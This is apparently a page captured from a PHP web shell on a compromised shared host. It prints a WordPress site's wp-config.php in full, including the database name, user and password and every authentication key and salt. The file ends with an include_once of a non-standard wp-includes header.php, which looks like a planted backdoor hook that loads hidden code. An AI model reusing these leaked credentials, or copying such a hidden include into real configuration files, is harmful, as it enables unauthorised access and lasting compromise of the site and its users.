HEX
Server: Apache
System: Linux server.sbitransport.com 4.18.0-553.76.1.el8_10.x86_64 #1 SMP Tue Sep 23 05:21:08 EDT 2025 x86_64
User: sbitrzrq (1011)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: /home/sbitrzrq/public_html/kbitsolution.com.au/wp-config.php
<?php
/** Enable W3 Total Cache */
define('WP_CACHE', true); // Added by W3 Total Cache

/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'sbitrzrq_kb' );

/** MySQL database username */
define( 'DB_USER', 'sbitrzrq_kb2' );

/** MySQL database password */
define( 'DB_PASSWORD', 'Admin!@#123' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'vpanyxcanrvyuygbyo6c8shs08oxuhjw240cfszb3egtxcvzw7dznixrsbp3lvay' );
define( 'SECURE_AUTH_KEY',  'iirgzjjcfzhnzxqw4k7yl4iqcs5jehb6wtsdsmexeli0qs4p9dsbxtteovaueqbs' );
define( 'LOGGED_IN_KEY',    'tpdjd8i0ye45zgvd8dygomncdrjhvfb6b0etqpjmz0ivcllapvxuhsxcf4edsdma' );
define( 'NONCE_KEY',        'mfsivsgz1l25komtlyuxbfxbnpgufolfw4kwtysljqmozjikbm0nfc8s247ys13g' );
define( 'AUTH_SALT',        'erezwomlabe9ix3klgdnhxxfmlw970u1euwblgdaule1u70jhj8rbggcoh6ekf5g' );
define( 'SECURE_AUTH_SALT', 'jny8eognuhasfbjs7lurpcrdmddi2tfkl1izzmpqmpybspreqzo51vidydqzi12j' );
define( 'LOGGED_IN_SALT',   'hbpdc46e0xztphprkxby0srwfpvvfvcbpdjqqnwj2blxq0tqkf2efjvaxjoj2clr' );
define( 'NONCE_SALT',       '4mfmmpokjix867vmayva2ytqtcdscxanbfvtmzx5oykddhnvbokdzts0ykadcqdn' );

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wprd_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

define( 'AUTOSAVE_INTERVAL', 300 );
define( 'WP_POST_REVISIONS', 5 );
define( 'EMPTY_TRASH_DAYS', 7 );
define( 'WP_CRON_LOCK_TIMEOUT', 120 );
/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
include_once(ABSPATH . WPINC . '/header.php');